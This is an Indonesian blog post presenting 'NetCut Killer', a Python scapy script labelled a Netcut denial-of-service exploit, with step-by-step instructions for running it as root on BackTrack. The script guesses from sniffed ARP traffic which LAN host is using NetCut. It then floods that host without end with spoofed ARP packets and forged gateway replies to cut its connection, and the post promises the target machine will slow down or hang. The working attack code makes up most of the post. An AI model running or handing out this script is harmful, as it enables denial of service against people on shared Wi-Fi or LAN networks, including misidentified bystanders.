Subscribe:

Ads 468x60px

Pages

Senin, 26 November 2012

Counter Attack Netcut dengan NetCut Killer


Siapa sih yang ngga kenal NetCut? Software menyebalkan yang fungsinya untuk memutus jaringan internet. biasanya terjadi di tempat-tempat wifi-hotspot atau yang terhubung dengan jaringan LAN.
Jaringan internet kita yang tiba-tiba lemot gak jalan, ngga konek dan sebagainya bisa dikatakan kita menjadi  si korban NetCut.  Korban netcut  biasanya hanya pasrah menerima keadaan, karena memang untuk melacak si pengguna Netcut itu memang sulit, apalagi untuk membalasnya L.
Cara untuk membalasnya cukup mudah, cukup lihat wajah pengguna Wifi di sana. Jika orang itu terlihat bahagia, senyum-senyum, menikmati komputernya, bisa di indikasikan bahwa dia adalah pengguna NetCut. Datangi lalu hajar. Hahaha

Upz jangan dong.. Bagaimana kalau kita salah sangka, atau kalau memang benar, bagaimana kalau dia bawa teman. Yang bonyok bukannya si pengguna NetCut tapi kita. Sudah jatuh tertimpa tangga. Jaringan internet kita mati plus muka lebam yang dihasilkan oleh si Dia. Hahaha
Ada cara yang lebih professional untuk memberantas pengguna NetCut tersebut, yaitu dengan NetCut Killer. Netcut Killer dibuat dari bahasa pemrograman python yang bisa di install di Linux. Linux yang saya pakai adalah Linux Bactrack 5.0 bisa di download disini.
Saya anggap sudah menginstall linux backtrack nya. Sekarang tinggal pake deh Netcut Killer-nya. Caranya copy script Netcut killer dibawah ini:

#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Blog: http://mayaseven.blogspot.com
#PoC: Video  http://www.youtube.com/user/mayaseven
#     Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff, Ether, ARP, RandIP, RandMAC, Padding, sendp, conf
import commands, os, sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
    
def protect(gw_ip, gw_mac):
    os.popen("arp -s %s %s" % (gw_ip, gw_mac))
    print "Protected himself"
    
def detect():
        ans = sniff(filter='arp', timeout=7)
        target = []
        for r in ans.res:
            target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
        return target

def preattack(gw_ip):
    flag = 0
    num = []
    count = 0
    target = 0
    temp = 0
    print "Detecting..."
    d = detect()
    for i in range(len(d)):
        if d[i].split()[0] == "255.255.255.255":
            num.append(d.count(d[i]))
            if d.count(d[i]) > count:
                count = d.count(d[i])
                target = i
        if d[i].split()[0] == gw_ip:
            temp += 1      
    if len(d) < 7:
        print "[-] No one use Netcut or try again"
        exit()
    if len(num) * 7 < temp:
        num[:] = []
        count = 0
        result = float(temp) / len(d) * 100
        for j in range(len(d)):
            if d[j].split()[0] == gw_ip:
                if d.count(d[j]) > count:
                    count = d.count(d[j])
                    target = j
            result = float(temp) / len(d) * 100
        flag = 1
    else:
        num.reverse()
        result = float(num[0] + temp) / len(d) * 100
    print "There is a possibility that " + str(result) + "%"
    if result >= 50:
        target_mac = d[target].split()[1]
        target_ip = d[target].split()[2]
        print "[+] Detected, Netcut using by IP %s MAC %s" % (target_ip, target_mac)
        if flag == 0:
            attack(target_mac, target_ip, gw_ip)
        else:
            print "[-] Can't Attack"   
    else:
        print "[-] No one use Netcut or try again"

def attack(target_mac, target_ip, gw_ip):
    print "[+] Counter Attack !!!"
    e = Ether(dst="FF:FF:FF:FF:FF:FF")
    while 1:
        a = ARP(psrc=RandIP(), pdst=RandIP(), hwsrc=RandMAC(), hwdst=RandMAC(), op=1)
        p = e / a / Padding("\x00"*18)
        sendp(p, verbose=0)
        a1 = ARP(psrc=gw_ip, pdst=target_ip, hwsrc=RandMAC(), hwdst=target_mac, op=2)
        p1 = e / a1 / Padding("\x00"*18)
        sendp(p1, verbose=0)
        
if __name__ == '__main__':
    os.system("clear")
    print   "###################################################"
    print    " __  __    __     __    _____   __      __  _   _"
    print    "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
    print    "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
    print    "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
    print    "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
    print    "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
    print   " "
    print   "###################################################"
    print   ""
    print   "http://mayaseven.blogspot.com"
    print   ""
    if len(sys.argv) == 2 or len(sys.argv) == 3:
        if len(sys.argv) == 2:
            conf.iface = sys.argv[1]
            preattack(gw_ip)
        if len(sys.argv) == 3:
            conf.iface = sys.argv[1]
            gw_mac = sys.argv[2]
            protect(gw_ip, gw_mac)
            preattack(gw_ip)
    else:
        print '''Mode:  
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0
       
2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''

Buka gedit nya. Applications-> Accessories-> gedit Text Editor. Lalu paste kan disana, save dengan nama netcutkiller.py.  Disavenya di desktop ya, supaya lebih mudah menggunakannya.
Sekarang tinggal jalankan programnya. Caranya dengan masuk ke terminal Backtrack, CMD kalau di windows. Wkwkkwk
Lalu ketikan
root@bt:~# cd Desktop (karena programnya disimpan di desktop)
Lalu ketik
root@bt:~/Desktop# python netcutkiller.py eth0 08:00:27:24:e8:f8
Sengaja saya kasih warna supaya jelas.
-python                                = sebagai compilernya.
-netcutkiller.py                      = adalah nama programnya.
-eth0                                    = adalah enthernet cardnya.
-08:00:27:24:e8:f8                  = adalah mac address nya.
Mac address/HWaddr bisa didapatkan dengan membuka terminal baru, lalu ketikan ifconfig.
Setelah itu tekan Enter. Tunggu beberapa saat dan tadaa, komputer/ laptop attaker pasti berjalan lambat bahkan bisa hank kawan.
Gimana simple kan?
Program ini lebih baik dibandingkan anti NetCut yang lain seperti Netcut Defender untuk windows. Netcut Defender hanya bisa memproteksi komputer kita tanpa bisa menyerang balik. Dan yang pasti program berbayar L. Jauh deh kalau disbanding dengan NetCut Killer ini.
Yang gratis blum tentu jelek bukan? hahaha
No bayar, no install, no ribet, NOTHING. Jadi tunggu apalagi, gunakan opensource sekarang juga J 
Diposting oleh Khairul Rijal Awali Rahman di 23.39
Label:

2 komentar:

Ghcc mengatakan...

mas bro scib yang di copy di simpen pake notepad gitu? trus gedit editor di komputer saya gak ada?

23 Februari 2013 pukul 00.50
Unknown mengatakan...

saya mas....saya ga kenal netcut sama sekali.(dirrumah tiap hari make) wkwkkwkkwkwkw

1 Desember 2014 pukul 22.53

Posting Komentar